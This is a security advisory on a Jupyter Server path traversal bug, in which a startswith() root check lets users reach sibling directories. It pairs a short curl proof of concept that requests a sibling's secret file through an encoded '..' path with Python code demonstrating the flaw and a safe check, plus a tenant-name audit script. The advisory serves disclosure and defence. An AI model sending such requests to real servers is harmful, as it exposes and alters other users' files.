Jupyter Server: Path Traversal via incorrect startswith() root directory check allows access to sibling directories

Description

Summary

In Jupyter Server <= 2.17.0, the check that confines the Contents API to the configured root directory compares path strings with startswith() instead of comparing path components. An authenticated user can therefore reach directories that are siblings of the root directory whenever the sibling's name starts with the root directory's name (for example, root directory test and sibling testtest).

PoC

Minimal:

.
├── test/              <- root directory.
│   └── test.txt
└── testtest/
    └── secret.txt     <- file to exfiltrate that we should not be able to access via API

HOST="http://localhost:8888"
TOKEN=""               # the authenticated user's Jupyter token
SIBLING="testtest"     # sibling directory whose name starts with the root dir's name
TARGET="secret.txt"

# %2e%2e is a URL-encoded "..". After decoding, the path resolves to
# ../testtest/secret.txt, which a prefix-only check accepts because the
# resolved string still starts with the root directory's path. The POST to
# /checkpoints creates a checkpoint of the sibling's file, proving both read
# and write reach outside root_dir.
curl -s -X POST \
  "$HOST/api/contents/%2e%2e/$SIBLING/$TARGET/checkpoints" \
  -H "Authorization: token $TOKEN"

Full PoC by @stef41: https://gist.github.com/Yann-P/66d4982a965dee8fcb8dd89db29e7006
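The following Python example is added here and is not Jupyter Server's code. It models the class of check the advisory describes (a normalized path tested with startswith() against the root path) next to a component-wise containment check, and walks the PoC's request path through both. The directory tree is constructed in a temporary directory and mirrors the layout above; the function names and the exact shape of the vulnerable check are assumptions for illustration, not the project's implementation.

```python
import os
import tempfile
from pathlib import Path
from typing import Dict, Optional
from urllib.parse import unquote


def build_layout(base: str) -> str:
    """Construct the advisory's PoC tree under base and return the root_dir.

        base/test/test.txt          <- served root directory
        base/testtest/secret.txt    <- sibling that must stay unreachable
    """
    root = os.path.join(base, "test")
    os.makedirs(root)
    Path(root, "test.txt").write_text("public\n")
    sibling = os.path.join(base, "testtest")
    os.makedirs(sibling)
    Path(sibling, "secret.txt").write_text("secret\n")
    return root


def resolve_prefix_check(root_dir: str, api_path: str) -> Optional[str]:
    """Hypothetical prefix-based root check (the bug class in the advisory).

    The API path is joined onto root_dir and normalised, and the result is
    accepted if the *string* starts with the root string.  For root
    '<base>/test', '../testtest/secret.txt' normalises to
    '<base>/testtest/secret.txt', which starts with '<base>/test', so the
    check passes although the file lies outside root_dir.
    """
    root = os.path.abspath(root_dir)
    candidate = os.path.abspath(os.path.join(root, api_path))
    return candidate if candidate.startswith(root) else None


def resolve_component_check(root_dir: str, api_path: str) -> Optional[str]:
    """Hardened check: containment is decided on whole path components.

    os.path.commonpath compares components, so '<base>/testtest/...'
    shares only '<base>' with '<base>/test' and is rejected.  An equivalent
    string form is: candidate == root or candidate.startswith(root + os.sep).
    """
    root = os.path.abspath(root_dir)
    candidate = os.path.abspath(os.path.join(root, api_path))
    try:
        common = os.path.commonpath([root, candidate])
    except ValueError:  # e.g. paths on different drives on Windows
        return None
    return candidate if common == root else None


def demo() -> Dict[str, object]:
    """Run the PoC's request path through both checks in a throwaway tree."""
    with tempfile.TemporaryDirectory() as base:
        root = build_layout(base)
        # What the server sees after URL-decoding "%2e%2e/testtest/secret.txt".
        api_path = unquote("%2e%2e/testtest/secret.txt")
        leaked = resolve_prefix_check(root, api_path)
        return {
            "api_path": api_path,
            "prefix_check_allows": leaked is not None,
            "prefix_check_reads": Path(leaked).read_text() if leaked else None,
            "component_check_allows": resolve_component_check(root, api_path) is not None,
            "component_check_allows_legit": resolve_component_check(root, "test.txt") is not None,
            "prefix_check_allows_other_sibling": resolve_prefix_check(root, "../other/secret.txt") is not None,
        }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value!r}")
```

The prefix check rejects ../other/secret.txt, which is why the bug only exposes siblings sharing the root's name as a prefix; the component check rejects both while still serving test.txt inside the root. Symlink handling (realpath) is a separate concern not covered by the advisory and is deliberately left out here.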

Impact

An authenticated user can access content outside the server's root_dir: every sibling directory whose name starts with the root_dir's name is reachable, and the attacker can read, write, and delete files there.

This has a tangible impact on multi-tenant deployments that use a predictable naming scheme (user1, user2, user3, ..., user10, ...) with one root directory per user: user1 can read and modify the files of user10 through user19, user100 through user199, and so on.

In a hypothetical system where users choose the name of their own folder, an attacker could pick a single-letter name to gain access to every sibling directory whose name begins with that letter.

Workarounds

Upgrade to jupyter-server 2.18.0. Until then, choose a root_dir whose name is not a prefix of any sibling directory's name (user1 next to user10 overlaps; zero-padded user01 next to user10 does not), or give each root directory its own parent so that it has no siblings at all.
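As an added check that is not part of the advisory or of Jupyter Server, the following Python lists, for a given root_dir, the sibling directories that a prefix-only root check would wrongly treat as inside it, and audits every directory under a parent as a candidate root. The multi-tenant layout (user1 through user20 plus user100, and a stray file user1.bak) is constructed in a temporary directory to mirror the naming scheme described under Impact; the function names are the example's own.

```python
import os
import tempfile
from pathlib import Path
from typing import Dict, List


def colliding_siblings(root_dir: str) -> List[str]:
    """Names of sibling directories that a startswith()-based root check
    would accept as being inside root_dir.

    A sibling collides when it shares root_dir's parent, its name starts
    with root_dir's name, and it is not root_dir itself.  Plain files are
    skipped: the traversal only matters for directories one can descend into.
    """
    root = Path(os.path.abspath(root_dir))
    hits = []
    for entry in root.parent.iterdir():
        if entry == root or not entry.is_dir():
            continue
        if entry.name.startswith(root.name):
            hits.append(entry.name)
    return sorted(hits)


def audit_roots(parent: str) -> Dict[str, List[str]]:
    """Treat every directory under parent as a candidate root_dir and report
    only those with colliding siblings (the exposed tenants)."""
    report = {}
    for entry in sorted(Path(parent).iterdir()):
        if entry.is_dir():
            hits = colliding_siblings(str(entry))
            if hits:
                report[entry.name] = hits
    return report


def demo_multi_tenant() -> Dict[str, List[str]]:
    """Constructed layout: per-user roots user1 .. user20 plus user100, and a
    stray file user1.bak that must not be reported as a reachable sibling."""
    with tempfile.TemporaryDirectory() as base:
        for n in list(range(1, 21)) + [100]:
            os.makedirs(os.path.join(base, f"user{n}"))
        Path(base, "user1.bak").write_text("not a directory\n")
        return audit_roots(base)


if __name__ == "__main__":
    for name, hits in demo_multi_tenant().items():
        print(f"{name}: reachable siblings {hits}")
```

On the constructed layout user1 is exposed to eleven siblings (user10 through user19 and user100), user2 to user20, and user10 to user100; renaming the roots to a fixed width (user001, user010, user100) makes the report empty, which is the property the workaround above asks for.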

Acknowledgments

Thank you to @stef41 for providing a useful PoC.

Basic information

Type
reviewed
Severity
high
Published (advisory)
2026-05-05 16:49:10 UTC
Updated
2026-06-06 00:23:56 UTC
GitHub reviewed
2026-05-05 16:49:10 UTC
NVD published
2026-05-05 20:16:38 UTC

EPSS Score

Score Percentile
0.06% 18.58%

CVSS Scores

Base score Version Severity Vector
7.1 3.1 High CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:L
Attack vector (AV:N)
Could be attacked over the internet or any normal routed network—not just someone sitting at the machine.
Attack complexity (AC:H)
Even with access, the exploit needs extra luck, timing, or a fussy environment to actually work.
Privileges required (PR:L)
A normal user session is enough; they don’t have to be admin.
User interaction (UI:N)
Nobody has to click “OK” or open a trap file; it can work without a victim helping.
Scope (S:U)
Damage stays in the same “trust bubble” as the broken component—no big spill into unrelated systems.
Confidentiality (C:H)
Serious risk that confidential data gets exposed in a big way.
Integrity (I:H)
They could widely tamper with or forge data—trust in the data is badly hurt.
Availability (A:L)
Might cause slowdowns, glitches, or partial disruption—not a full brick.
7.6 4.0 High CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:L/SC:N/SI:N/SA:N
Attack vector (AV:N)
Could be attacked over the internet or any normal routed network.
Attack complexity (AC:L)
Exploitation conditions are straightforward and stable.
Attack requirements (AT:P)
Additional preconditions must be present for exploitation.
Privileges required (PR:L)
Low privileges are required.
User interaction (UI:N)
No user interaction is required.
Vulnerable system confidentiality impact (VC:H)
High confidentiality impact on the vulnerable system.
Vulnerable system integrity impact (VI:H)
High integrity impact on the vulnerable system.
Vulnerable system availability impact (VA:L)
Limited availability impact on the vulnerable system.
Subsequent system confidentiality impact (SC:N)
No confidentiality impact on subsequent systems.
Subsequent system integrity impact (SI:N)
No integrity impact on subsequent systems.
Subsequent system availability impact (SA:N)
No availability impact on subsequent systems.

Identifiers

CWEs

CWE id Name
CWE-22 Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')

Credits

  • Yann-P (remediation_developer)
  • Carreau (coordinator)
  • stef41 (finder)
  • krassowski (coordinator)

Affected packages (1)

Vulnerable version ranges and first patched releases as published by GitHub.

Ecosystem Package Vulnerable range First patched Vulnerable functions
pip jupyter-server <= 2.17.0 2.18.0
